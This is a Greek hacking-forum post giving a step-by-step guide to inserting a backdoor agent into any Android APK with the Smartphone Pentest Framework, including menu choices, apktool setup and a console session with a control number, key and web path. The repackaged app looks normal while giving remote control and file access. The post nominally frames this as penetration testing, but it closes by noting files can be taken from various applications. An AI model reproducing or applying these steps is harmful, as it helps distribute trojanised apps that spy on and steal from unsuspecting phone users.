Μετάβαση στο περιεχόμενο

  • ChatBox

    ChatBox

    Chatroom Rules

    • Το GreekHacking.Gr είναι ένα ελληνικό forum και επιτρέπεται μόνο η χρήση της Ελληνική Γλώσσας (ούτε greeklish).
    • Δεν επιτρέπονται οι βρισιές και γενικά η χρήση χυδαίας γλώσσας.
    • Απαγορεύεται αυστηρά το πορνογραφικό, προσβλητικό και βίαιο περιεχόμενο.
    • Μην χρησιμοποιείτε κεφαλαία γράμματα η σύμβολα.
D/\rknes$

Κάντε Backdooring κάθε APK χρησιμοποιώντας OpenSource PENETRATION TESTING tools

Από D/\rknes$, , 1104, 5 in Διάφοροι οδηγοί σχετικά με το hacking

Recommended Posts

D/\rknes$    37

D/\rknes$
Δημοσιεύτηκε (edited)

Το Smartphone Pentest Framework κυκλοφορεί με τα Kali Linux και είναι πολύ γνωστό για τη χρησιμότητά του στη δοκιμή διείσδυσης των συσκευών Android.

Έχει ένα τεράστιο φάσμα εργαλείων επίθεσης που περιλαμβάνονται στον εαυτό του για τη διείσδυση δοκιμών των συσκευών Android.

Ένα από τα χαρακτηριστικά είναι να πάρει ένα συμπιεσμένο αρχείο APK ( Application ) και να προσθέσει backdoor κώδικα σε αυτό.

Αυτό το σεμινάριο είναι για το πώς μπορείτε να πάρετε τα προσαρμοσμένα αρχεία APK και να προσθέσετε το backdoor SPF σε αυτά.

[hide]

Η εφαρμογή που προκύπτει φαίνεται σαν μια απλή εφαρμογή, αλλά με κάποια επιπλέον λειτουργικά.

Αυτό η εφαρμογή είναι ακριβώς ότι θα ήθελε ένας δοκιμαστής διείσδυσης εφαρμογών.

Ας πούμε ότι κάνετε έναν Έλεγχο Ασφάλειας για έναν οργανισμό.

Εάν δεν θέλετε να χρησιμοποιήσετε το απλό APK που δημιουργείται από το SPF, τότε το SPF σας επιτρέπει να πάρετε ένα προ-επεξεργασμένο APK και να προσθέσετε προσαρμοσμένο κωδικό backdoor σε αυτό.

Αυτό είναι επίσης γνωστό ως refactoring του APK στους όρους δοκιμής διείσδυσης. Αυτό όμως θα απαιτήσει τη χρήση ενός apktool τρίτου μέρους.

Για backdoor οποιαδήποτε APK επιλέξτε την επιλογή 1 από το κύριο μενού που ακολουθείται από 5.) Backdoor APK με του Agent.

Θα σας ζητηθεί να ανοίξει το ΑPK ( Application ). Εάν δεν υπάρχει apktool, το SPF θα σας ρωτήσει εάν θέλετε να το κατεβάσετε πριν συνεχίσετε. 

spf> 1
Select An Option from the Menu:
1.) Attach Framework to a Deployed Agent
2.) Generate Agent App
3.) Copy Agent to Web Server
4.) Import an Agent Template
5.) Backdoor Android APK with Agent
6.) Create APK Signing Key
spf> 5
APKTool not found! Is it installed? Check your config file
Install Android APKTool(y/N)?
spf> y
..snip..
Puts the Android Agent inside an Android App APK. The application runs normally with extra functionality
APK to Backdoor: /root/Desktop/MapsDemo.apk
I: Baksmaling...

Τώρα θα σας ζητηθούν οι ίδιες πληροφορίες για τον έλεγχο ως backdoor πηγαίο κώδικα.

 

Phone number για το the control modem για το agent θα είναι: 15555215554 

Control key for the agent: KEYKEY1
Webserver control path for agent: /androidagent1
Control Number: 15555215554
Control Key:KEYKEY1
ControlPath:/androidagent1
Is this correct?(y/n) y
..snip..

 

Το APK θα ξαναχτιστεί αυτή την φορά μαζί με τον παράγοντα SPF.

Και με αυτόν τον τρόπο μπορείτε να πάρετε αρχεία από διάφορα applications

 

Good Hacking ;)

[/hide]

Edited by Alex
0

 

Μοιράσου αυτή την δημοσίευση

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Απάντηση στο θέμα...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Επιστροφή στην ενότητα

ChatBox

ChatBox

Chatroom Rules

  • Το GreekHacking.Gr είναι ένα ελληνικό forum και επιτρέπεται μόνο η χρήση της Ελληνική Γλώσσας (ούτε greeklish).
  • Δεν επιτρέπονται οι βρισιές και γενικά η χρήση χυδαίας γλώσσας.
  • Απαγορεύεται αυστηρά το πορνογραφικό, προσβλητικό και βίαιο περιεχόμενο.
  • Μην χρησιμοποιείτε κεφαλαία γράμματα η σύμβολα.
×
×
  • Create New...